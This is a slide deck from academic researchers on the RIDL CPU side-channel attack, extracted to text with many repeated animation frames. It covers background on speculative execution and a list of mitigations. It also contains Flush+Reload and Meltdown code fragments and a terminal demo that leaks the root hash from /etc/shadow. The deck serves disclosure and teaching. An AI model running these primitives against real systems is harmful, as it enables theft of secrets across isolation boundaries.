# **RIDLed with CPU bugs**

<u>Stephan van Schaik</u> - <u>Alyssa Milburn</u>

Sebastian Österlund - Pietro Frigo - Giorgi Maisuradze\*

Kaveh Razavi - Herbert Bos - Cristiano Guiffrida





# **CPU**



# **THE CLOUD**

# **ISOLATION**

- Processes
- Containers
- Virtual machines

We trust CPUs to isolate virtual machines..

# OH-OH!

| 1315703 | Modification of the translation table for a virtual page which is being accessed by an active<br>process might lead to read-after-write ordering violation              |
|---------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 905797  | Failure to enforce read-after-read ordering rules                                                                                                                       |
| 961148  | Reads from DSU CLUSTER* or ERX* system registers might return corrupted data                                                                                            |
| 977072  | Accessing certain Debug or Generic Timer system registers in AArch32 might cause<br>incorrect system register values                                                    |
| 981980  | Interrupt is taken immediately after MSR DAIF instruction masks the interrupt                                                                                           |
| 1043202 | AArch32 T32 CLREX in an IT block will clear exclusive monitor even if it fails condition code<br>check                                                                  |
| 1073348 | Concurrent instruction TLB miss and mispredicted return instruction might fetch wrong instruction stream                                                                |
| 1130799 | TLBI VAAE1 or TLBI VAALE1 targeting a page within hardware page aggregated address<br>translation data in the L2 TLB might cause corruption of address translation data |
| 1165347 | Continuous failing STREX because of another core snooping from speculatively executed atomic behind constantly mispredicted branch might cause livelock                 |
| 1165522 | Speculative AT instruction using out-of-context translation regime could cause subsequent request to generate an incorrect translation                                  |
| 1188873 | MRC read following MRRC read of specific Generic Timer in AArch32 might give incorrect result                                                                           |
| 1207823 | The exclusive monitor might end up tracking an incorrect cache line in the presence of a VA-<br>alias, causing a false pass on the exclusive access sequence            |
| 1220197 | Streaming store under specific conditions might cause deadlock or data corruption                                                                                       |
| 1257314 | Multiple floating-point divides/square roots concurrently completing back-to-back and<br>flushing back-to-back might cause data corruption                              |
| 1262606 | Concurrent instruction TLB miss and mispredicted branch instruction located at the end of<br>32MB region might fetch wrong instruction stream                           |
| 1262888 | Translation access hitting a prefetched L2 TLB entry under specific conditions might corrupt<br>the L2 TLB leading to an incorrect translation                          |
| 1275112 | A T32 instruction inside an IT block followed by a mispredicted speculative instruction stream might cause a deadlock                                                   |
| 1463225 | Software Step might prevent interrupt recognition                                                                                                                       |
| 1286807 | Modification of the translation table for a virtual page which is being accessed by an active process might lead to read-after-read ordering violation                  |
|         |                                                                                                                                                                         |

MCA Error May Incorrectly Report Overflow Condition

MWAIT Instruction May Hang a Thread

Miss Address Buffer Performance Counter May Be Inaccurate Three-Source Operand Floating Point Instructions May Block Another Thread on the Same Core FCMOV Instruction May Not Execute Correctly When SMAP is Enabled and EFLAGS.AC is Set, the Processor Will Fail to Page Fault on an Implicit Supervisor Access Instructions Retired Performance Counter May Be Inaccurate MWAIT or MWAITX Instructions May Fail to Correctly Exit From the Monitor Event Pending State Executing Code in the Page Adjacent to a Canonical Address Boundary May Cause Unpredictable Results In Real Mode or Virtual-8086 Mode MWAIT or MWAITX Instructions May Fail to Correctly Exit From the Monitor Event Pending State PCIe\* Controller Will Generate MSI (Message Signaled Interrupt) With Incorrect Requestor ID L3 Performance Event Counter May Be Inaccurate 16-bit Real Mode Applications May Fail When Virtual Mode Extensions (VMF) Are Enabled Spurious Level 2 Brunch Turget Buffer (1.2 BTB) Multi-Match Error May Occur CPUID Fn8000 0007 EDX[CPB] Incorrectly Returns 0 PCle® Link Exit to LD in Gen1 Mode May Incorrectly Trigger NAKs. Programming MSRC001. 0015 [Handware Configuration] (HWCR)[CpbDix] Does Not Affect All Threads In The Socket PCIe<sup>®</sup> Link in Gen3 Mode May Incorrectly Observe EDB Error and Enter Recovery xHCI Host May Fail To Respond to Resume Request From Downstream USB Device Within 1 ms 4K Address Boundary Crossing Load Operation May Receive Stale Data USB Device May Not be Enumerated After Device Reset Potential Violation of Read Ordering In Lock Operation In SMT (Simultaneous Multithreading) Mode The GuestInstribytes Field of the VMCB on a VMEXIT May Incorrectly Return 0h

| Status | Errata                                                                                                                   |  |  |  |
|--------|--------------------------------------------------------------------------------------------------------------------------|--|--|--|
| No Fix | Intel® CAT/CDP Might Not Restrict Cacheline Allocation Under Certain Conditions (Intel® Xeon® Processor Scalable Family) |  |  |  |
| No Fix | Intel® PT PSB+ Packets May be Omitted on a C6 Transition                                                                 |  |  |  |
| No Fix | IDI_MISC Performance Monitoring Events May be Inaccurate                                                                 |  |  |  |
| No Fix | Intel® PT CYC Packets Can be Dropped When Immediately Preceding PSB                                                      |  |  |  |
| No Fix | Intel® PT VM-entry Indication Depends on The Incorrect VMCS Control Field                                                |  |  |  |
| No Fix | Intel® MBA Read After MSR Write May Return Incorrect Value                                                               |  |  |  |
| No Fix | In eMCA2 Mode, When The Retirement Watchdog Timeout Occurs CATERR# May be Asserted                                       |  |  |  |
| No Fix | VCVTPS2PH To Memory May Update MXCSR in The Case of a Fault on The Store                                                 |  |  |  |
| No Fix | Intel® PT May Drop All Packets After an Internal Buffer Overflow                                                         |  |  |  |
| No Fix | Non-Zero Values May Appear in ZMM Upper Bits After SSE Instruction                                                       |  |  |  |
| No Fix | ZMM/YMM Registers May Contain Incorrect Values                                                                           |  |  |  |
| No Fix | When Virtualization Exceptions are Enabled, EPT Violations May<br>Generate Erroneous Virtualization Exceptions           |  |  |  |
| No Fix | Intel® PT ToPA Tables Read From Non-Cacheable Memory During an Intel® TSX<br>Transaction May Lead to Processor Hang      |  |  |  |
| No Fix | Performing an XACQUIRE to an Intel® PT ToPA Table May Lead to Processor Hang                                             |  |  |  |
| No Fix | Using Intel® TSX Instructions May Lead to Unpredictable System Behavior                                                  |  |  |  |
| No Fix | Reading Some C-state Residency MSRs May Result in Unpredictable<br>System Behavior                                       |  |  |  |
| No Fix | Performance in an 8sg System May Be Lower Than Expected                                                                  |  |  |  |
| No Fix | Memory May Continue to Throttle after MEMHOT# De-assertion                                                               |  |  |  |
| No Fix | Unexpected Uncorrected Machine Check Errors May Be Reported                                                              |  |  |  |

# **PIPELINES**

We blindly trust CPU pipelines

We don't know how they work

# **SPECULATIVE EXECUTION**



# a = compute() if (a) doX(a)



# Time

a = read memory

if (allowed to read memory)

doX(a)

# **EXCEPTION DEFERRAL**

# **TODAY**

Intel CPUs are everywhere

Intel has a bounty program

#### **INTEL CPU**



# **CPU**



#### **INTEL CPU**



# **TODAY**

One class of Intel pipeline "bugs": MDS

#### I SPECULATE THAT THIS WON'T BE THE LAST SUCH BUG -

# New speculative execution bug leaks data from Intel chips' internal buffers

Intel-specific vulnerability was found by researchers both inside and outside the company.

PETER BRIGHT - 5/14/2019, 8:10 PM

# Protecting your computer against Intel's latest security flaw is easy, unless it isn't

Spectre is going to haunt us for a very long time

By Dieter Bohn | @backlon | May 17, 2019, 9:12am EDT

iks data

Intel-specific vulnerability was found by researchers both inside and outside the company.

PETER BRIGHT - 5/14/2019, 8:10 PM

# Protecting your computer against Intel's latest security flaw is easy, unless it isn't

Spectre is going to haunt us for a very long time

By Dieter Bohn | @backlon | May 17, 2019, 9:12am EDT

iks data

Intel-specific vulnerability was found by researchers both inside and outside the

RIDL vulnerability hits Intel - new Side Channel Attack potentially is worse than Spectre and Meltdown \*\*\*\*\*\*\*\*

by Hilbert Hagedoorn on: 05/14/2019 08:38 PM | source: volkskrant.nl | 168 comment(s)

Protecting against Inflaw is eas

Buffer the Intel flayer: Chipzilla, Microsoft, Linux world, etc emit fixes for yet more data-leaking processor flaws

Intel CPUs dating back a decade are vulnerable to latest cousin of Spectre

By Thomas Claburn in San Francisco 14 May 2019 at 17:00 55 ☐ SHARE ▼

Spectre is going to haunt us for a very long time

By Dieter Bohn | @backlon | May 17, 2019, 9:12am EDT

ıks data

Intel-specific vulnerability was found by researchers both inside and outside the

by Hilbert Hagedoorn on: 05/14/2019 08:38 PM | source: volkskrant.nl | 168 comment(s)

Protecting against Inflaw is eas

Buffer the Intel flayer: Chipzilla, Microsoft, Linux world, etc emit fixes for yet more data-leaking processor flaws

Intel CPUs dating back a decade are vulnerable to latest cousin of Spectre

By Thomas Claburn in San Francisco 14 May 2019 at 17:00 55 ☐ SHARE ▼

Spectre is going to haunt us for a very long time

By Dieter Bohn | @backlon | May 17, 2019, 9:12am EDT

#### updates against MDS attacks

Microsoft releases standalone updates containing Intel microcode mitigations for recently disclosed MDS attacks.

By Liam Tung | June 4, 2019 -- 12:10 GMT (13:10 BST) | Topic: Security

iks data

le and outside the

k potentially is worse than



Let's first talk about cache attacks

# **BACKGROUND**



# **BACKGROUND**



# **BACKGROUND**



#### **FLUSH + RELOAD**

#### (1) FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### (2) VICTIM

```
char byte = table[secret];
```

## 3 RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

#### **Probe Array**





#### FLUSH + RELOAD

# 1 FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}</pre>
```

#### (2) VICTIM

```
char byte = table[secret];
```

## (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

#### **Probe Array**



#### **FLUSH + RELOAD**

# 1 FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}</pre>
```

#### (2) VICTIM

```
char byte = table[secret];
```

## 3 RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

#### **Probe Array**

| 园 | ПП | П      | Sŀ | Л |
|---|----|--------|----|---|
| G |    | $\cup$ | ୬៤ | Ш |

# 1 FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

### (2) VICTIM

```
char byte = table[secret];
```

# 3 RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

### **Probe Array**

# 1 FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}</pre>
```

### (2) VICTIM

```
char byte = table[secret];
```

# (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

### **Probe Array**

# 1 FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

### (2) VICTIM

```
char byte = table[secret];
```

# 3 RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

(1) FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

2 VICTIM

```
char byte = table[secret];
```

3 RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

# (1) FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

# 2 VICTIM

```
char byte = table[secret];
```

# 3 RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

### **Probe Array**

# (1) FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

### (2) VICTIM

```
char byte = table[secret];
```

# 3 RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

### **Probe Array**

### (1) FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

### (2) VICTIM

```
char byte = table[secret];
```

# 3 RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

### **Probe Array**

**ACCESS** 

# (1) FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

# (2) VICTIM

```
char byte = table[secret];
```

# 3 RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

### **Probe Array**

**DRAM** 

# (1) FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

# (2) VICTIM

```
char byte = table[secret];
```

# 3 RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

### **Probe Array**

ACCESS

# (1) FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

### (2) VICTIM

```
char byte = table[secret];
```

# 3 RELOAD

```
for (i = 0; i < 256; ++i) {
   t0 = __rdtsc();
   *(volatile char *)(probe + i * 4096);
   dt = __rdtsc() - t0;
}</pre>
```

### **Probe Array**

SECRET

**DRAM** 

# (1) FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

# (2) VICTIM

```
char byte = table[secret];
```

# (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

### **Probe Array**

### **ACCESS**

# (1) FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

### (2) VICTIM

```
char byte = table[secret];
```

# 3 RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

### **Probe Array**

### **CACHE**

# **PREVIOUS ATTACKS**







SPECTRE **CVE-2017-5715 CVE-2017-5753** 

**FORESHADOW** 

CVE-2018-3615 CVE-2018-3620 CVE-2018-3646

# **PREVIOUS ATTACKS**

- Meltdown
- Spectre
- Foreshadow or L1TF

```
char secret = *(volatile char *)kaddr;
```

(2) FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

(3) MELTDOWN

```
if (_xbegin() == _XBEGIN_STARTED) {
   char byte = *(volatile char *)kaddr;
   char *p = probe + 4096 * byte;
   *(volatile char *)p;
   _xend();
}
```

4 RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

```
char secret = *(volatile char *)kaddr;
```

(2) FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}</pre>
```

(3) MELTDOWN

```
if (_xbegin() == _XBEGIN_STARTED) {
  char byte = *(volatile char *)kaddr;
  char *p = probe + 4096 * byte;
  *(volatile char *)p;
  _xend();
}
```

4 RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

```
char secret = *(volatile char *)kaddr;
```

2 FLUSH

### Kernel data in L1d cache

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

### (3) MELTDOWN

```
if (_xbegin() == _XBEGIN_STARTED) {
  char byte = *(volatile char *)kaddr;
  char *p = probe + 4096 * byte;
  *(volatile char *)p;
  _xend();
}
```

### 4 RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

```
char secret = *(volatile char *)kaddr;
```

(2) FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}</pre>
```

(3) MELTDOWN

```
if (_xbegin() == _XBEGIN_STARTED) {
  char byte = *(volatile char *)kaddr;
  char *p = probe + 4096 * byte;
  *(volatile char *)p;
  _xend();
}
```

4 RELOAD

```
for (i = 0; i < 256; ++i) {
   t0 = __rdtsc();
   *(volatile char *)(probe + i * 4096);
   dt = __rdtsc() - t0;
}</pre>
```

```
char secret = *(volatile char *)kaddr;
```

2 FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

### (3) MELTDOWN

```
if (_xbegin() == _XBEGIN_STARTED) {
  char byte = *(volatile char *)kaddr;
  char *p = probe + 4096 * byte;
  *(volatile char *)p;
  _xend();
}
```

### 4 RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

#### Probe Array

```
char secret = *(volatile char *)kaddr;
```

2 FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}</pre>
```

(3) MELTDOWN

```
if (_xbegin() == _XBEGIN_STARTED) {
   char byte = *(volatile char *)kaddr;
   char *p = probe + 4096 * byte;
   *(volatile char *)p;
   _xend();
}
```

(4) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

Probe Array

```
char secret = *(volatile char *)kaddr;
```

2 FLUSH

```
for (i = 0; i < 256; ++i) {
   _mm_clflush(probe + i * 4096);
}</pre>
```

(3) MELTDOWN

```
if (_xbegin() == _XBEGIN_STARTED) {
  char byte = *(volatile char *)kaddr;
  char *p = probe + 4096 * byte;
  *(volatile char *)p;
  _xend();
}
```

4 RELOAD

```
for (i = 0; i < 256; ++i) {
   t0 = __rdtsc();
   *(volatile char *)(probe + i * 4096);
   dt = __rdtsc() - t0;
}</pre>
```

Probe Array

```
char secret = *(volatile char *)kaddr;
```

(2) FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

(3) MELTDOWN

```
if (_xbegin() == _XBEGIN_STARTED) {
  char byte = *(volatile char *)kaddr;
  char *p = probe + 4096 * byte;
  *(volatile char *)p;
  _xend();
}
```

(4) RELOAD

```
for (i = 0; i < 256; ++i) {
   t0 = __rdtsc();
   *(volatile char *)(probe + i * 4096);
   dt = __rdtsc() - t0;
}</pre>
```

```
char secret = *(volatile char *)kaddr;
```

(2) FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

(3) MELTDOWN

```
if (_xbegin() == _XBEGIN_STARTED) {
   char byte = *(volatile char *)kaddr;
   char *p = probe + 4096 * byte;
   *(volatile char *)p;
   _xend();
}
```

4 RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

```
char secret = *(volatile char *)kaddr;
```

(2) FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}</pre>
```

(3) MELTDOWN

```
if (_xbegin() == _XBEGIN_STARTED) {
   char byte = *(volatile char *)kaddr;

Leak kernel data from L1d cache
   _xend();
}
```

(4) RELOAD

```
for (i = 0; i < 256; ++i) {
   t0 = __rdtsc();
   *(volatile char *)(probe + i * 4096);
   dt = __rdtsc() - t0;
}</pre>
```

```
char secret = *(volatile char *)kaddr;
```

(2) FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}</pre>
```

(3) MELTDOWN

```
if (_xbegin() == _XBEGIN_STARTED) {
  char byte = *(volatile char *)kaddr;
  char *p = probe + 4096 * byte;
  *(volatile char *)p;
  _xend();
}
```

4 RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

```
char secret = *(volatile char *)kaddr;
```

(2) FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}</pre>
```

(3) MELTDOWN

```
if (_xbegin() == _XBEGIN_STARTED) {
  char byte = *(volatile char *)kaddr;
  char *p = probe + 4096 * byte;
  *(volatile char *)p;
  _xend();
}
```

4 RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

Probe Array

```
char secret = *(volatile char *)kaddr;
```

2 FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}</pre>
```

(3) MELTDOWN

```
if (_xbegin() == _XBEGIN_STARTED) {
  char byte = *(volatile char *)kaddr;
  char *p = probe + 4096 * byte;
  *(volatile char *)p;
  _xend();
}
```

4 RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

Probe Array

```
char secret = *(volatile char *)kaddr;
```

#### 2 FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}</pre>
```

### (3) MELTDOWN

```
if (_xbegin() == _XBEGIN_STARTED) {
   char byte = *(volatile char *)kaddr;
   char *p = probe + 4096 * byte;
   *(volatile char *)p;
   _xend();
}
```

### 4 RELOAD

```
for (i = 0; i < 256; ++i) {
   t0 = __rdtsc();
   *(volatile char *)(probe + i * 4096);
   dt = __rdtsc() - t0;
}</pre>
```

#### Probe Array

**ACCESS** 

```
char secret = *(volatile char *)kaddr;
```

### 2 FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

### (3) MELTDOWN

```
if (_xbegin() == _XBEGIN_STARTED) {
   char byte = *(volatile char *)kaddr;
   char *p = probe + 4096 * byte;
   *(volatile char *)p;
   _xend();
}
```

### 4 RELOAD

```
for (i = 0; i < 256; ++i) {
   t0 = __rdtsc();
   *(volatile char *)(probe + i * 4096);
   dt = __rdtsc() - t0;
}</pre>
```

#### Probe Array

DRAM

```
char secret = *(volatile char *)kaddr;
```

(2) FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

(3) MELTDOWN

```
if (_xbegin() == _XBEGIN_STARTED) {
  char byte = *(volatile char *)kaddr;
  char *p = probe + 4096 * byte;
  *(volatile char *)p;
  _xend();
}
```

4 RELOAD

```
for (i = 0; i < 256; ++i) {
   t0 = __rdtsc();
   *(volatile char *)(probe + i * 4096);
   dt = __rdtsc() - t0;
}</pre>
```

Probe Array

ACCESS SECRET

```
char secret = *(volatile char *)kaddr;
```

(2) FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

(3) MELTDOWN

```
if (_xbegin() == _XBEGIN_STARTED) {
   char byte = *(volatile char *)kaddr;
   char *p = probe + 4096 * byte;
   *(volatile char *)p;
   _xend();
}
```

4 RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

Probe Array

DRAM SECRET

```
char secret = *(volatile char *)kaddr;
```

2 FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}</pre>
```

(3) MELTDOWN

```
if (_xbegin() == _XBEGIN_STARTED) {
  char byte = *(volatile char *)kaddr;
  char *p = probe + 4096 * byte;
  *(volatile char *)p;
  _xend();
}
```

4 RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

**Probe Array** 

ACCESS

```
char secret = *(volatile char *)kaddr;
```

(2) FLUSH

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

(3) MELTDOWN

```
if (_xbegin() == _XBEGIN_STARTED) {
  char byte = *(volatile char *)kaddr;
  char *p = probe + 4096 * byte;
  *(volatile char *)p;
  _xend();
}
```

4 RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

Probe Array

CACHE

# **MITIGATIONS**

- Kernel Page Table Isolation
- Array index masking
- XOR masking

# **KPTI**



**Problem**: leak kernel data from virtual addresses

# **KPTI**



**Solution**: unmap kernel addresses

So we have a system with all mitigations in-place

```
pent tse deadline timer aes xsave avx f16c rdrand lahf lm abm 3dnowprefetch
 cpuid fault cat l3 cdp l3 invpcid single pti ssbd mba ibrs ibpb stibp tpr
shadow vnmi flexpriority ept vpid ept ad fsgsbase tsc adjust bmil hle avx2
smep bmi2 erms invpcid rtm cgm mpx rdt a avx512f avx512dg rdseed adx smap c
lflushopt clwb intel pt avx512cd avx512bw avx512vl xsaveopt xsavec xgetbv1
xsaves cgm llc cgm occup llc cgm mbm total cgm mbm local dtherm ida arat pl
n pts hwp hwp act window hwp pkg reg flush lld
[sebastian@sarek ~ ] $ grep . /sys/devices/system/cpu/vulnerabilities/*
/sys/devices/system/cpu/vulnerabilities/lltf:Mitigation: PTE Inversion; VM
: conditional cache flushes, SMT vulnerable
/sys/devices/system/cpu/vulnerabilities/meltdown:Mitigation: PTI
/sys/devices/system/cpu/vulnerabilities/spec store bypass:Mitigation: Spec
lative Store Bypass disabled via prctl and seccomp
/sys/devices/system/cpu/vulnerabilities/spectre v1:Mitigation: user poin
er sanitization
/sys/devices/system/cpu/vulnerabilities/spectre v2:Mitigation: Full generi
 retpoline, IBPB: conditional, IBRS FW, STIBP: conditional, RSB filling
[sebastian@sarek ~ ]$
```

What can we still do as an attacker?

```
[sebastian@sarek ridl ] $ cat /etc/shadow
cat: /etc/shadow: Permission denied
[sebastian@sarek ridl ] s sudo cat /etc/shadow | head -n 1
root:$6$sP/i.m6uVkNRJgpV$vyndShgzWmeWI8Bx8RbGCkj2SVvQ.bjqwRafe6rdnotl8ndQkv
H/wf1u.cF31o9Ie0W/Ub/6CVEdbCJioHplW/:17828:0:99999:7:::
[sebastian@sarek ridl ]$ ./hackpasswd root:
root:$6$sP/i.m6uVkNRJgpV$vyndShgzWmeWI8Bx8RbGCkj2SVvQ.bjgwRafe6%
[sebastian@sarek ridl ]$
```

## Meet Rogue In-flight Data Load or RIDL

A new **class** of speculative execution attacks that knows no boundaries

Privilege levels are just a *social construct* 



We can leak between hardware threads!



But can we leak across other security domains?



Yes, we can!



We leak from the kernel ...



... across VMs ...



... from the hypervisor ...



... and from SGX enclaves!

We leak across all security domains!

Can we leak in the web browser?

Yes, we can!

- We reproduced RIDL in Mozilla Firefox
- $\Rightarrow$  No need for special instructions

We leak across security domains, and in the browser!

Memory addresses are a *social construct* too

#### **PREVIOUS ATTACKS**



Previous attacks show we can speculatively leak from **addresses** 

#### **PREVIOUS ATTACKS**



Our mitigation efforts focus on isolating/masking addresses

- **Spectre**: access out-of-bound *addresses*
- Meltdown: leak kernel data from virtual addresses
- Foreshadow: leak from physical address

- **Spectre**: mask array index to limit *address* range
- **Meltdown**: unmap kernel *addresses* from userspace
- Foreshadow: invalidate physical address

#### **PREVIOUS ATTACKS**

- Previous attacks exploit addressing
- Mitigation by isolating/masking addresses

## **RIDL**

RIDL does *not* depend on addressing:

- ⇒ Bypass *all* address-based security checks
- ⇒ Makes RIDL **hard to mitigate**

What CPUs does RIDL affect?

We bought Intel and AMD CPUs from almost every generation since 2008

... and sent the invoices to our professor Herbert Bos



RIDL works on all mainstream Intel CPUs since 2008

# SUPPORT

Season Francis | Processor |

#### Side-channel Vulnerability and Mitigation Methods

The security of our products is use of our must important provides.

The fitnest enuronment continues to evone free is committed to investing in the security and resoluting of our products, and to working to categorard users.

Specific to side observables extremibilities, notigations have been provided for all wasness noted below through a continuation of updates for

- · Firthware
- . Operating systems
- . Virtual Machine Harager\*

Egyptem manufacturem, have incorporated these updates. Some triel products may contain hardware ineligations. See the lable below for militation details.

| Processor Model          | Vulnerability and Miligation Mathod                             |                                                                      |                                                                    |                                                                           |                                               |                                      |  |  |
|--------------------------|-----------------------------------------------------------------|----------------------------------------------------------------------|--------------------------------------------------------------------|---------------------------------------------------------------------------|-----------------------------------------------|--------------------------------------|--|--|
|                          | Verlant 1<br>(Bounds Check<br>Bypess; also known<br>as Spectra) | Verlent ≥<br>(Sinarch Target<br>Injection; also known<br>as Spectre) | Varrant 3<br>(Rogue Data Cache<br>Load, also known as<br>Heltdown) | Virtant 3a<br>(Rugue System Register<br>Read) else known as<br>Meltidown) | Variant 4<br>(Regue System<br>Register Resul) | Variant 5<br>(£1 Terreinal<br>Feaft) |  |  |
| Intel® Core®             | OS/VHM                                                          | Firmum +Ob                                                           | Hardwore                                                           | Formure                                                                   | Firmwire +0%                                  | Handware                             |  |  |
| Intel® Core®<br>(7-9700h | OS/VHH4                                                         | Firmware +OS                                                         | Hardware                                                           | firmer                                                                    | Firmware +OS                                  | Hardware                             |  |  |





#### Documentation

Content Type Product Information & Documentation

Bettine ID 000031501

Last Strywest 11/21/2018

- FIIIIIWaic
- Operating systems
- Virtual Machine Manager\*

System manufacturers have incorporated these updates. Some Intel products may contain hardware mitigations. See the table below for mitigation details:

|                          | Vulnerability and Mitigation Method                                   |                                                                           |                                                                       |                                                                             |                                        |                                           |  |
|--------------------------|-----------------------------------------------------------------------|---------------------------------------------------------------------------|-----------------------------------------------------------------------|-----------------------------------------------------------------------------|----------------------------------------|-------------------------------------------|--|
